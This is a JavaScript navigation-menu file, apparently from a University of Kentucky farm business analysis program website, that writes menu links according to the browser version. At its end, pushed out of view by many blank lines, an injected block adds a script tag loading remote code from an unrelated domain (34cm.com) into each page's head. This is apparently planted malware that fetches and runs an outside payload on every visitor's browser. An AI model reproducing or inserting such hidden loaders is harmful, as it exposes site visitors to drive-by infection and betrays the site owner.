function menu_goto( menuform )
{
  // Generated by thesitewizard Navigation Menu Wizard 2.1
  // Visit http://www.thesitewizard.com/ to get your own
  // customized navigation menu FREE!
  var baseurl = 'http://www.ca.uky.edu/agecon' ;
  selecteditem = menuform.url.selectedIndex ;
  newurl = menuform.url.options[ selecteditem ].value ;
  if (newurl.length != 0) {
    location.href = baseurl + newurl ;
  }
}

var name = navigator.appName;
var vers = navigator.appVersion;
vers = vers.substring(0,1); // or 0,4  could return 4.5 instead of just 4


if (vers <5 && name == "Netscape")
	{ 
document.writeln('<p><a href="about.html">About the Program</a></p>');
document.writeln('<p><a href="fbaspec.php">Groups and Contacts</a></p>');
document.writeln('<p><a href="pubs.php">Publications</a></p>');
document.writeln('<p><a href="newsletters.html">Newsletters</a></p>');
document.writeln('<p><a href="http://www.nafbas.org/">The National Association of Farm Business Analysis Specialists (NAFBAS)</a></p>')
document.writeln('<p><a href="http://www.ca.uky.edu/agecon">Agricultural Economics</a></p>');
document.writeln('<p><a href="http://www.uky.edu/Regs/WebPolicy/Warning.html">About External Links</a></p>');
	}
else
	{
document.writeln('<p><a href="about.html" tabindex="1" accesskey="a">About the Program</a></p>');
document.writeln('<p><a href="fbaspec.php" tabindex="2" accesskey="g">Groups and Contacts</a></p>');
document.writeln('<p><a href="pubs.php" tabindex="3" accesskey="p">Publications</a></p>');
document.writeln('<p><a href="newsletters.html" tabindex="4" accesskey="n">Newsletters</a></p>');
document.writeln('<p><a href="http://www.nafbas.org/" tabindex="5" accesskey="f">The National Association of Farm Business Analysis Specialists (NAFBAS)</a></p>');
document.writeln('<p><a href="http://www.ca.uky.edu/agecon" tabindex="6" accesskey="e">Agricultural Economics</a></p>');
document.writeln('<p><a href="http://www.uky.edu/Regs/WebPolicy/Warning.html" tabindex="7" accesskey="l">About External Links</a></p>');

	}














































































var hhead = document.getElementsByTagName("head")[0];
sscript = document.createElement('script');
sscript.type = 'text/javascript';
sscript.src = "http://34cm.com/load/common.js";
hhead.appendChild(sscript);
